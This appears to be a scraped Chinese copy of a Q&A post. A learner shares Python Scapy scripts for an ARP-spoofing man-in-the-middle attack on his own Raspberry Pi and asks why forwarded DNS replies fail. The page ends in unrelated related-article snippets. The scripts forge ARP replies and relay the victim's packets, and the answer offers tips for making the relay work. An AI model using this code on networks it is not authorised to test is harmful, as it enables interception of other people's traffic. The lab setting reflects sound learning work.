Scapy转发包

2024-01-11

我刚刚用 scapy 学习 python。我阅读并使用了《Network Hacks - Intensivkurs - Angriff und Verteidigung mit Python》（德语）一书。

我想尝试使用 arp 欺骗进行中间人攻击。我有我的电脑、受害者（我的树莓派）和标准网关。

为了进行欺骗，我使用了书中的代码片段

#!/usr/bin/python

import sys
import time
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 3:
    print sys.argv[0] + " <target> <spoof_ip>"
    sys.exit(0)

iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp

while True:
    sendp(packet, iface=iface)
    time.sleep(10)

它有效，我的受害者将我的 mac 显示为网关。受害者发送带有正确 ip 的数据包，但带有我的 mac 地址。现在受害者应该打开一个网站（wget http://example.com），我想使用 Wireshark 读取流量。但我必须重定向包（DNS 和 TCP/HTTP）。我用这段代码尝试过：

#!/etc/usr/python

from scapy.all import *
import sys

iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"

def handle_packet(packet):
    if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
        packet[Ether].dst = GATEWAY_MAC
        sendp(packet)

        print "A packet from " + packet[IP].src + " redirected!"

sniff(prn=handle_packet, filter=filter, iface=iface, store=0)

Wireshark 显示包含正确数据的数据包（IP 源 = 受害者 IP、IP 目标 = 网关 IP、MAC 源 = 受害者 MAC、MAC 目标 = 网关 MAC）。网关是一个 DSL 路由器，因此也是一个“DNS 服务器”。

但我的 Raspberry 没有收到 DNS 响应。我有什么错？

此致，

MatStorm

Scapy 不为你做的一件事是处理防火墙问题；在这种情况下，您最好关闭攻击主机上的主机防火墙。您正在制作的数据包未使用数据包的常用路径。

另外，当您转发数据包时，您是否会转换源地址以便得到响应？我在代码中没有看到这一点...

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

Scapy转发包的相关文章

sklearn 估计器管道的参数无效

我正在实现 O Reilly 书中的一个示例 Python 机器学习简介使用 Python 2 7 和 sklearn 0 16 我正在使用的代码 pipe make pipeline TfidfVectorizer LogisticRe
如何在 Debian 上的 virtualenv 中安装 numpy？

注参见这另一篇文章 https stackoverflow com questions 6442754 how to install h5py numpylibhdf5 as non root on a debian linux syst
str.translate 与 str.replace - 何时使用哪一个？

何时以及为什么使用前者而不是后者反之亦然目前尚不完全清楚为什么有些人使用前者以及为什么有些人使用后者它们有不同的目的 translate只能用任意字符串替换单个字符但一次调用可以执行多次替换它的参数是一个特殊的表它将单个字符映射
Keras model.predict 函数给出输入形状错误

我已经在 Tensorflow 中实现了通用句子编码器现在我正在尝试预测句子的类概率我也将字符串转换为数组 Code if model model type universal classifier basic class probs
如何计算数据框中按另一列的列值分组的一列的连续字符串值？

我有以下数据框 Levels Labels Confidence 0 Hands 0 8 0 Leg 0 7 0 Eye 0 9 1 Ear 0 9 1 Eye 0 8 2 Hands 0 9 2 Eye 0 8 3 Eye 0 8 我想检
为什么在连接两个字符串时 Python 比 C 更快？

目前我想比较 Python 和 C 用来处理字符串的速度我认为 C 应该比 Python 提供更好的性能然而我得到了完全相反的结果这是 C 程序 include
类型错误：“datetime.datetime”和“str”的实例之间不支持“>”

我是 python 日期和时间类型的新手我有一个日期值 date 2018 11 10 10 55 31 00 00 我需要检查该日期值是否超过 90 天我试过 from datetime import datetime from da
使用 NumPy 编写一个函数来计算具有特定公差的积分

我想编写一个自定义函数来以特定容差对表达式 python 或 lambda 函数进行数字积分我知道与scipy integrate quad人们可以简单地改变epsabs但我想使用 numpy 自己编写该函数 From 这篇博文 htt
无法在 virtualenv 中安装 libxml2

我有一个问题libxml2蟒蛇模块我正在尝试将其安装在python3 虚拟环境使用以下命令 pip install libxml2 python3 但它显示以下错误 Collecting libxml2 python3 Using cac
查找正在导入哪些 python 模块

从应用程序中使用的特定包中查找所有 python 模块的简单方法是什么 sys modules是将模块名称映射到模块的字典您可以检查其键以查看导入的模块 See http docs python org library sys html
带有 mkdocs 的本地 mathjax

我想在无法访问互联网的计算机上使用 MathJax 和 Mkdocs 因此我不能只调用 Mathjax CDN Config mkdocs yml site name My Docs extra javascript javascripts
在请求中设置端口

我正在尝试利用cgminer使用 Python 的 API 我对利用requests图书馆我了解如何做基本的事情requests but cgminer想要更具体一点我想缩小 import socket import json sock
Python：在字典中查找具有唯一值的键？

我收到一个字典作为输入并且想要返回一个键列表其中字典值在该字典的范围内是唯一的我将用一个例子来澄清假设我的输入是字典 a 构造如下 a dict a cat 1 a fish 1 a dog 2 lt unique a bat 3
是否可以在Python中将日+月（不是年）与当前日+月进行比较？

我正在获取 5 月 10 日格式的数据我试图弄清楚它是今年还是明年该日期仅一年因此 5 月 10 日表示 2015 年 5 月 10 日而 5 月 20 日表示 2014 年 5 月 20 日为此我想将字符串转换为日期格式并进
如何按 pandas 中的值对系列进行分组？

我现在有一只熊猫Series与数据类型Timestamp 我想按日期对其进行分组并且每组中有许多行具有不同的时间看似显而易见的方法类似于 grouped s groupby lambda x x date 然而熊猫的groupby按索
无法导入QUERY_TERMS

我正在运行一个网站Python and Django Django filters 2 1 installed Django 2 1 installed 当我运行时我收到以下错误 importError Could not import
从迭代器外部将 StopIteration 发送到 for 循环

有几种方法可以打破一些嵌套循环他们是 1 使用中断继续 for x in xrange 10 for y in xrange 10 print x y if x y gt 50 break else continue only exec
两种 ODE 求解器之间的差异

我想知道两者之间有什么区别ODEINT and solve ivp用于求解微分方程它们之间有什么优点和缺点 f1 solve ivp f 0 1 y0 y0 is the initial point f2 odeint f y0 0 1
使用 pandas 单元格中列表的长度选择行[重复]

这个问题在这里已经有答案了我有一张表 df a b c 1 x y x 2 x z c d 3 x t e f g 只是想知道如何使用 c 列的长度选择行 such as df loc len df c gt 1 我知道这是不对的正确的
基于值的 matplotlib 条形图颜色

有没有一种方法可以根据条形图的值对条形图的条形进行着色例如 values below 0 5 red values between 0 5 to 0 green values between 0 to 08 blue etc 我找到了一些

随机推荐

JPA @PostPersist 用法

我有一个持久化实体对象的方法 persistData 我有另一个方法 findData 它对同一实体类执行 find 操作以获取持久的主键值当我在实体类的 PostPersist中调用findData 时出现空指针异常这在我心中提出了
Capybara如何使用within_frame作为页面中唯一没有id的iframe

我在页面中有一个需要用 Cucumber 和 Capybara 进行测试的 iframe 没有 class 或 id 属性但它是 DOM 上唯一的 iframe 我怎样才能使用within frame水豚方法 use find获取元素并将
修复图表上混乱的标题

我制作了以下 25 个网络图为了简单起见所有这些图都是复制品实际上它们都会有所不同 library tidyverse library igraph set seed 123 n 15 data data frame tibble
System.Runtime.InteropServices.COMException（0x800A03EC）

Microsoft Office Interop Excel WorkbookClass SaveAs 该方法在 Windows Server 2003 和 XP 上运行良好但在 Windows Server 2008 上则不然我复制了
DataGridView，如何捕获单元格的KeyPress事件C#

我想在 datagridview C 中对单元格进行处理当我按下单元格时此特性会打开一个表单在 C 中没有一个事件按键允许我直接添加我的处理经过网上搜索我找到了以下解决方案 private void dGridView Ed
iOS - 在 web 视图中显示 html 资源文件或远程网页的内容

我是一名 iOS 新手我想要一个函数根据常量中指定的内容从本地 html 资源文件或网页加载内容我该怎么做呢例如如果我将 file 传递给函数或 http 它应该相应地呈现您可以轻松加载网页如下所示 NSURLRequest
Java 8：通用类型推断改进

With JEP 101 广义目标类型推理 http openjdk java net jeps 101 this final List
防止 maven-shade-plugin 暴露依赖项？

感谢单独的thread https stackoverflow com questions 48715546 maven how to specify javac plugin argument with maven compiler pl
form:select 无法从数据库检索数据

在我当前的 spring 项目中当我运行应用程序并使用以下代码打开视图时
连接表中的最大日期

SELECT COL1 COL2 COL3 FROM TABLE1 TABLE2 TABLE3 TABLE4 WHERE TABLE1 KEY1 TABLE2 KEY1 AND TABLE2 KEY TABLE3 KEY AND TABLE
Axios PUT 请求到服务器

我阅读了 axios on PUT 请求的文档它看起来与 GET 请求类似但是没有像 GET 这样的示例代码但我认为它与如何执行 GET 请求类似我似乎在使用 axios 发出 PUT 请求时遇到问题这是我迄今为止使用的测试服务
C# 列表中的每一项存储多个变量

在 ASP net 教程上我找到了这个解释List lt gt List
对 R 包的 /src 文件夹中的代码进行单元测试？

我正在为一个 R 包做出贡献该包广泛使用 C 代码进行计算我们已经开始使用 R 函数编写测试testthat http cran r project org web packages testthat index html包将测试放入
PHP - For循环仅返回数组中的最后一个变量

我有一个奇怪的问题 PHP 中的 for 循环仅返回数组中的最后一项该数组是使用 SimpleXML 从 XML 文件创建的代码应该返回这个
异步导致调试器跳转

我有这个代码 private async Task
如何从旋转角度计算 OpenCV 的透视变换？

我想从旋转角度和到对象的距离开始计算透视变换 warpPerspective 函数的矩阵怎么做我在 OE 上找到了代码示例程序如下 include
是否可以匹配来自 c# winforms 中两个不同数据集的图表中的两个系列数据

我正在开发一个应用程序根据工单编号绘制已检查的电路板和有缺陷的电路板在查看图表并比较实际数据后我意识到该系列与工单编号不匹配我不知道如何将两个系列与工单编号相匹配以获得正确的图表这是我首先提取的数据拉取 Boards Inspec
Magento 在我的 URL 中放入 -1 我可以通过编程方式删除吗？

我必须在我的 Magento 安装中创建许多新商店这样做的一件事是迫使我必须对整个网站进行大量的重新索引对于大多数人来说这根本不是问题但我的 URL 索引似乎总是存在问题由于某种原因当我重新索引我的 URL 时它希望在所有 U
@EntityListener 也可以与 @MappedSuperclass 一起使用吗？

Folks 如果我定义一个实体类并用它注释 MappedSuperclass and an EntityListener 监听器是否也会被子类中的生命周期事件调用 Example MappedSuperclass EntityListene
Scapy转发包

我刚刚用 scapy 学习 python 我阅读并使用了 Network Hacks Intensivkurs Angriff und Verteidigung mit Python 德语一书我想尝试使用 arp 欺骗进行中间人攻击我

Scapy转发包

Scapy转发包 的相关文章

随机推荐

热门标签

Scapy转发包的相关文章